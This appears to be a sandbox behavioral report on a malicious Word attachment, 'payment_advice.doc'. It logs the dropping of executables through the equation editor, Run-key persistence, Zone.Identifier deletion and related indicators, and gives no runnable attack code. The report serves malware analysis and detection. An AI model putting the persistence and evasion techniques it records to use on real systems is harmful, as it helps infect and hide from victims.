Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F78A5
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F24D0
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F1AEA
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F86D1
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F1B61
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F0798
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023FCFF8
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F78A5
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F9818
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F24C1
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F856C
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F4D50
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B30E00
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B31788
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B31A69
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B30048
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B305B0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B30115
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B30006
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B31778
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4B4B0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B46898
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4C900
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4D108
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B46837
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4342F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4E828
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B47467
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4684E
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B479A0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4F5E8
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4A1C0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4812F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4711A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B432E0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4764F
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4B788
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4FBF0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B4AF28
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C24D0
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C9828
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C914A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C4A08
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C6A18
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C5620
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C9630
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C0B80
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C779A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C07A8
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C9818
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C4D50
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C856C
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C86D1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C1AEA
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C779A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C1B61

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\twox67345.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8

Source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$
Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC
Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp	Binary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@20/9@10/3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$yment_advice.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC6A8.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ....................P."...........W.a.i.t.i.n.g. .f.o.r. .1.....................................0.................&.......................".....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J.................".....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ......................!...........W.a.i.t.i.n.g. .f.o.r. .1.....$...............................................8.........................!.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.......J.................!.....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s....
Source: C:\Windows\SysWOW64\timeout.exe	Console Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s....

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\twox67345.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\twox67345.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: payment_advice.doc

ReversingLabs: Detection: 43%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\twox67345.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
Source:	Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00614823 push ebp; ret
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_006139E0 pushad ; ret
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00612DFE push ebp; ret
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_00613FD9 pushfd ; retf
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023F6FBD push 8BFFFFFDh; retf
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Code function: 9_2_023FA5A8 pushfd ; ret
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B44823 push ebp; ret
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B42DFE push ebp; ret
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_00B43FD9 pushfd ; retf
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Code function: 16_2_048C6FB7 push 8BFFFFFDh; retf

Persistence and Installation Behavior:

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\twox67345.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\twox67345.exe	File created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe	Jump to dropped file

Boot Survival:

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW			Jump to behavior
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYW			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	File opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes \| delete
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	File opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
